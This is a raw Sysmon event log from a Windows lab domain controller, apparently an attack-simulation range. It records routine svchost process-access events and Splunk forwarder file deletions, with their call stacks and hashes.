21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026143Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026142Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F32-60D3-D100-00000000CF01}100C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F32-60D3-D100-00000000CF01}100C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000026123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.276{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D3F8BE17EBD2C1221D5735C77D0EB49,SHA256=A14E98791F8D45D9639BBC4D65B1955791BC8A7404EFDB76CD3904D4BCD08FA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:36.340{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EB822047F8BAB4E526F8737C18C7402,SHA256=78D93DB45752ED378E980F604B84E24B7E815D768E2BA46809780FF81EBD5159,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:37.356{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FF2520CDD8C26A9DF795053FF328206,SHA256=B0C07C029DB19AF26F31E29496D682A5B703A9689C1967485E1AE31501370C2A,IMPHASH=00000000000000000000000000000000falsetrue